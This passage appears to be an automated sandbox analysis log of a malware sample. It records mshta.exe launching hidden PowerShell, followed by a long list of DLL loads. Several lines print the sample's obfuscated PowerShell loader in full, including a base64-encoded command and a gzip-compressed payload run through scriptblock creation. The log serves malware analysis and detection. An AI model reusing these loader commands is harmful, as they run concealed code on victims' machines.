          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBKAHUAWABHAFkAQwBBADcAVgBXACsAMAAvAGIAUwBCAEQAKwAvAGEAVAArAEQAMQBZAFYAeQBiAFkAYQBZAHUAZABSAEsARQBpAFYAYgB1ADIAUQBCACsAQwBRAFkASgBLAFEAcABOAEYAcABhADIALwBzAEoAVwB0AHYAcwBEAGUARQAwAE8AdgAvAGYAcgBPAE8AegBlAE8AQQBpAGoAdQBwAGwAZwBMADcAbQBKAG0AZAAvAGUAYQBiAG0AVgAyAHMAWQAwADkAUQBIAGkAdgB4AGMAcQBEADgAKwBQAEMASABrAG4AOQA5AG4ATwBCAEkAMABVAHEAKwBXAFYAWgBLAHkAYQBYACsAdQBGAE4AYQBWAEoAVwB2AGkAagBaAEQAcQAxAFcAVABSADUAagBHADgANgBNAGoAZQA1ADAAawBKAEIAYQA3AGUAYQBWAE4AQgBFAHAAVABFAG4AMQBuAGwASwAnACcAKwAnACcAUwBhAHIAdgB5AHQAagBFAE8AUwBrAEwAewAxAH0AegA3ADkAZgBFAEUAOABvAFAAcABmAFIAWABwAGMAewAxACcAJwArACcAJwB9ADQAZAA4AHgAeQBzAGEAMgBOAHYAWgBBAG8AZQB5AGoAMgA1AGQANABaADkANwBEADAAcQBlAEsAdQBHAEIAVwBhACsAdQAyAGIAcQBzAC8AMgBxAHYAUABLADgAYwAwAGEAcwAxAFIAVAB7ADEAfQBXADAAcQBTAEYAVAB4AEcAVgBOADEANQBhAGMAdQBEADcAegBjAHIAbwBpAG0ATwB0AFIATABlAE0AbwBYAG8AagBLAG0AYwBiADEAVwBHAGMAWQBwAFgAcABBAGUAVwBMAHMAbABEAHsAMgB9AEUAewAyAH0AOQAxAE0AVgByAHYASgA0AG0AWQBTAEkAZABSAEwATABPADAAawBqAE8AeABGAE4AewAyAH0AVwBFAC8ANAAnACcAKwAnACcAUgA3AHkALwBZAFMAawBxAFYAcABXAFoAdABMADgAYgBEADcALwBVADUAdgBsAFoAMQArAHMAWQAwAEUAagBVAHUAbgBHAGcAaQBSADgANQBaAEwAawBsAG4AbwBrAHIAWABSAHcANwBEAE4AeQBRAFIAWgB6ADAASABKAEYAUQB1AE4AZwByAHUAcwBnAGQAcwB1AFgAUgBDAHYARgBhADgAYgBLAHkAbgA4AHgAbwAvAFgASQBwAGsARAB1AHYAVQByAGEAVQB5AFcAUQA2AG8AdABFAEwAMABNAHcAWAAnACcAKwAnACcAOQB6AFMAJwAnACsAJwAnADQAZgA2AGEAawBaADIAZQArAG8AcQBiAEUASAA0AGQAdgB7ADIAfQAwAEYAQQBMAGkAZgBFAHIAdABGAFEAWgBuAGwALwBpAHUATQBlAFYAdwBvAHYAbABtADIAUQA4AEIAWAByAGMAOQBUAG0AcQAnACcAKwAnACcAbAArAFYAJwAnACsAJwAnAFkAQgBYAEQAcAB5AEwAQgBVACsAMgBNAEMAMQBkAEoAbQB1AGkAegB4ACsAUQBWAGsAcgBZAEwAYgAvAFgAVgByAFYAUQBsAEcAcQBuAHMARABBAGIAYwBlAHIAUABIADkAVwBmAHgAYgB5AFUANwBMAE4AQQBDAHIAewAxAH0ATgA0AEMAWgBaADAASgBnADAAdAB6AEcATwBxAEYAZQBRAFYASABzAHQARgBHAFQAQgBTAEkAWgBHAHAAUgBEAHIAZwBYACsAYQBtAG0AOABRAHYAMABrAFkA
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq'+'l+V'+'YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbuyQCKDbzYGipQW'+'kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O'+'BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59'+'FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU'+'D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt'+'SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbbrS+IboKN96WHPP/EJ4fuqCHc466w+6gzoKbVCD{1}'+'LvJTja{2}BQM5ggvzcIPWb2j6OzXje9MzadseM1rftNLQWiN{2}qdKxPV64{1}zurkE8CagtwSdiG7uzmAMVfT8zOqmltllxyf2xfdxrTUds47RaIWLMU/d/UnTMIxDHzedLUIW9+vO9qp6wS87XmQ1Ym4c2o0lOkbIjo9HLYufTqwE9Y0RDlZ8FIWnnVpgI+'+'TXKZkO{2}i1rMG{2}ZaNi+vmkeGoFxOL7CoTUe1e{2}0dXURwry16QxODbPR9ck9n24AuDZHOLgAmcCueeECZJqfkPWpx9MaXlocWSDTmt6gdj{2}ZtfoM9i+HNY5GrHeF0dl02zK'+'M6qTfQB2Tj9sBGoA'+'4DqwBRult875pVEc+98efe5OFMbpiB0bTHvTDK{1}lnYxXJv5tO89SbVjfe+cGXszEdRRwNDWP0EVgxG9JY1Gvz'+'kggcWTM//FHaWPfdJ8x4qxc4OElDzIAxUOaLtG{1}xpJUX7z6nUkPTZN9fkiQmDPoldNSC7ogx7smuAVUe+tWui8imNuxmLr020pUH'+'Qf2xmxRLR0dTcBESKGN{1}5YzEgQjL5l{1}dNKEZmHdmI0uW99/M5quttrNWlv0kw+bBPsvsg0m6UDTtt+MFDwYBJewtxN4CDw5eQsWBArirBBJCi{1}P2FMD8Xg9keIYfAFeFu8/kW0'+'HSBCzskRulJGQ/fdqfS0vfOY{2}/K{1}Xyk{2}bCP//X1Hlc+8Xuu+{2}klnfwvF{2'+'}+vvCkE/y++48xFSDoQl1mZPdQeA2GPFmeBDgLDaTCIv/km/l8LfZ68A7LesM/Y1pUE6cLAAA{0}')-f'=','3','h')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBKAHUAWABHAFkAQwBBADcAVgBXACsAMAAvAGIAUwBCAEQAKwAvAGEAVAArAEQAMQBZAFYAeQBiAFkAYQBZAHUAZABSAEsARQBpAFYAYgB1ADIAUQBCACsAQwBRAFkASgBLAFEAcABOAEYAcABhADIALwBzAEoAVwB0AHYAcwBEAGUARQAwAE8AdgAvAGYAcgBPAE8AegBlAE8AQQBpAGoAdQBwAGwAZwBMADcAbQBKAG0AZAAvAGUAYQBiAG0AVgAyAHMAWQAwADkAUQBIAGkAdgB4AGMAcQBEADgAKwBQAEMASABrAG4AOQA5AG4ATwBCAEkAMABVAHEAKwBXAFYAWgBLAHkAYQBYACsAdQBGAE4AYQBWAEoAVwB2AGkAagBaAEQAcQAxAFcAVABSADUAagBHADgANgBNAGoAZQA1ADAAawBKAEIAYQA3AGUAYQBWAE4AQgBFAHAAVABFAG4AMQBuAGwASwAnACcAKwAnACcAUwBhAHIAdgB5AHQAagBFAE8AUwBrAEwAewAxAH0AegA3ADkAZgBFAEUAOABvAFAAcABmAFIAWABwAGMAewAxACcAJwArACcAJwB9ADQAZAA4AHgAeQBzAGEAMgBOAHYAWgBBAG8AZQB5AGoAMgA1AGQANABaADkANwBEADAAcQBlAEsAdQBHAEIAVwBhACsAdQAyAGIAcQBzAC8AMgBxAHYAUABLADgAYwAwAGEAcwAxAFIAVAB7ADEAfQBXADAAcQBTAEYAVAB4AEcAVgBOADEANQBhAGMAdQBEADcAegBjAHIAbwBpAG0ATwB0AFIATABlAE0AbwBYAG8AagBLAG0AYwBiADEAVwBHAGMAWQBwAFgAcABBAGUAVwBMAHMAbABEAHsAMgB9AEUAewAyAH0AOQAxAE0AVgByAHYASgA0AG0AWQBTAEkAZABSAEwATABPADAAawBqAE8AeABGAE4AewAyAH0AVwBFAC8ANAAnACcAKwAnACcAUgA3AHkALwBZAFMAawBxAFYAcABXAFoAdABMADgAYgBEADcALwBVADUAdgBsAFoAMQArAHMAWQAwAEUAagBVAHUAbgBHAGcAaQBSADgANQBaAEwAawBsAG4AbwBrAHIAWABSAHcANwBEAE4AeQBRAFIAWgB6ADAASABKAEYAUQB1AE4AZwByAHUAcwBnAGQAcwB1AFgAUgBDAHYARgBhADgAYgBLAHkAbgA4AHgAbwAvAFgASQBwAGsARAB1AHYAVQByAGEAVQB5AFcAUQA2AG8AdABFAEwAMABNAHcAWAAnACcAKwAnACcAOQB6AFMAJwAnACsAJwAnADQAZgA2AGEAawBaADIAZQArAG8AcQBiAEUASAA0AGQAdgB7ADIAfQAwAEYAQQBMAGkAZgBFAHIAdABGAFEAWgBuAGwALwBpAHUATQBlAFYAdwBvAHYAbABtADIAUQA4AEIAWAByAGMAOQBUAG0AcQAnACcAKwAnACcAbAArAFYAJwAnACsAJwAnAFkAQgBYAEQAcAB5AEwAQgBVACsAMgBNAEMAMQBkAEoAbQB1AGkAegB4ACsAUQBWAGsAcgBZAEwAYgAvAFgAVgByAFYAUQBsAEcAcQBuAHMARABBAGIAYwBlAHIAUABIADkAVwBmAHgAYgB5AFUANwBMAE4AQQBDAHIAewAxAH0ATgA0AEMAWgBaADAASgBnADAAdAB6AEcATwBxAEYAZQBRAFYASABzAHQARgBHAFQAQgBTAEkAWgBHAHAAUgBEAHIAZwBYACsAYQBtAG0AOABRAHYAMABrAFkAJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq'+'l+V'+'YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbuyQCKDbzYGipQW'+'kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O'+'BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59'+'FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU'+'D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt'+'SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbbrS+IboKN96WHPP/EJ4fuqCHc466w+6gzoKbVCD{1}'+'LvJTja{2}BQM5ggvzcIPWb2j6OzXje9MzadseM1rftNLQWiN{2}qdKxPV64{1}zurkE8CagtwSdiG7uzmAMVfT8zOqmltllxyf2xfdxrTUds47RaIWLMU/d/UnTMIxDHzedLUIW9+vO9qp6wS87XmQ1Ym4c2o0lOkbIjo9HLYufTqwE9Y0RDlZ8FIWnnVpgI+'+'TXKZkO{2}i1rMG{2}ZaNi+vmkeGoFxOL7CoTUe1e{2}0dXURwry16QxODbPR9ck9n24AuDZHOLgAmcCueeECZJqfkPWpx9MaXlocWSDTmt6gdj{2}ZtfoM9i+HNY5GrHeF0dl02zK'+'M6qTfQB2Tj9sBGoA'+'4DqwBRult875pVEc+98efe5OFMbpiB0bTHvTDK{1}lnYxXJv5tO89SbVjfe+cGXszEdRRwNDWP0EVgxG9JY1Gvz'+'kggcWTM//FHaWPfdJ8x4qxc4OElDzIAxUOaLtG{1}xpJUX7z6nUkPTZN9fkiQmDPoldNSC7ogx7smuAVUe+tWui8imNuxmLr020pUH'+'Qf2xmxRLR0dTcBESKGN{1}5YzEgQjL5l{1}dNKEZmHdmI0uW99/M5quttrNWlv0kw+bBPsvsg0m6UDTtt+MFDwYBJewtxN4CDw5eQsWBArirBBJCi{1}P2FMD8Xg9keIYfAFeFu8/kW0'+'HSBCzskRulJGQ/fdqfS0vfOY{2}/K{1}Xyk{2}bCP//X1Hlc+8Xuu+{2}klnfwvF{2'+'}+vvCkE/y++48xFSDoQl1mZPdQeA2GPFmeBDgLDaTCIv/km/l8LfZ68A7LesM/Y1pUE6cLAAA{0}')-f'=','3','h')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))Jump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
